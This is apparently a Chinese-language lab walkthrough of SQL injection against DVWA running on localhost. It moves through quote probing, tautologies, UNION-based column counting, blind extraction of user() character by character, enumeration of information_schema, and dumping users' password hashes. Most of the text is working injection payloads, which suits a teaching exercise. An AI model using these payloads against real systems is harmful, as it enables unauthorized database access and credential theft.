首先看看輸入正常的ID得到什麼結果：

當輸入1‘ 時：

說明了這個id的型別是個string，資料庫是MySQL

當輸入1’ and '1'='1時，and後面的1=1是個永真式：

當輸入1‘ or '1'='1是，這個式子是個永真式，返回所有結果：

確定資料表的列數：

輸入' union select 1,2 --'

而輸入' union select 1,2，3 --'時返回

可以確定這裡資料表有兩列。

確定這個資料表有兩列後，輸入 1' and 1=1 union select database(),user()#

返回database()為dvwa，user()為[email protected]

union操作合併兩條或多條select語句的查詢結果。如果應用程式返回了第一個但是查詢得到的所有資料，在通過在一個查詢後面注入union運算子並新增另外一個任意查詢，便可以讀取到資料庫使用者訪問過的任何一個表。

還有另一個辦法檢視user()，但比較麻煩，是按位元提取資料的：

對於這樣的URL：localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

實際進行的查詢為：SELECT first_name, last_name FROM users WHERE user_id = ‘1’

因為id引數是可注入的，就可以使用字串連線技術來提取資料。

對於長度大於1的字串比較容易分，這裡主要介紹長度為1的字串如何獲得可操控的數字引數。

localhost/dvwa/vulnerabilities/sqli/?id=’%2B'1'%2B'&Submit=Submit#

對應的查詢是：SELECT first_name, last_name FROM users WHERE user_id = ‘’+‘1’+''   顯然與上面的查詢等價。

再進一步，由於1的ASCII是49，char()函式接收一個數字作為引數並返回與其對應的ASCII字元，則可以把/?id=’%2B'1'%2B'改寫為/?id=’%2Bchar(49)%2B'

獲得了可操控的數字引數，再利用CASE語句構造如下輸入：

'+char(49+(case when (substring(user(),1,1) > 't') then 1 else 0 end))+'

當返回的頁面與查詢1一致說明substring(user(),1,1) <= '某個字元'

若返回的頁面與查詢2一致說明substring(user(),1,1) > '某個字元'

利用二分查詢法就可確定user()的第一個字母是什麼，依次再查詢第二個第三個字母.......

輸入： '+char(49+(case when (substring(user(),1,1) > 'r') then 1 else 0 end))+'

因為user()的第一個字母是r,故返回頁面與查詢1是一樣的。

輸入1' and 1=1 union select null,table_name from information_schema.tables#

通過查詢information_schema系統表，看到了這個MySQL資料庫中每一個表的名字。

這這堆表名中找到了dvwa使用的表guestbook和users：

然後根據以下命令檢視uses表中的內容：

'union select null,column_name from information_schema.columns where table_name='users'-- '        不知道為什麼最後面的--與它後面的‘要空格隔開

接下來檢視users表中的user和password：

'union select user,password from users -- '

得到了密碼的MD5值。

想要一次展示更多的引數可以使用concat函式：

'union select concat(first_name,' ',last_name,' ',user),password from users -- '